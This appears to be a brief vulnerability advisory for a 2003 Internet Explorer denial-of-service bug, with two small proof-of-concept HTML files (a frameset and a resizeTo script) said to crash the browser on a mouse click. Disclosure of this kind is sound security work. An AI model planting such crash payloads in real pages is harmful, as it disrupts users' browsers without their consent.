Microsoft Internet Explorer is susceptible to a denial of service flaw where it crashes upon a mouse click.
ceae8f052f104f765314c7924b7f7ee8f64188d330b5e05e340d3562f5d82012
Title:
Microsoft Internet Explorer - Crash on mouse button click
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Both
Date of discovery:
2003/12/28
Release date:
2006/05/20
Affected software:
Microsoft Internet Explorer
Description:
There is a bug in Microsoft Internet Explorer, which causes a crash on mouse button click.
PoC exploit code:
1) exploit_1.html
<frameset cols="0%, *">
<frame src="exploit_2.html">
</frameset>
2) exploit_2.html
<SCRIPT>
self.resizeTo(2003, 1228);
</SCRIPT>
PoC exploit sample:
http://www.kil13r.info/iebug/exploit_1.html
PoC exploit screenshot:
http://www.kil13r.info/iebug/screenshot.jpg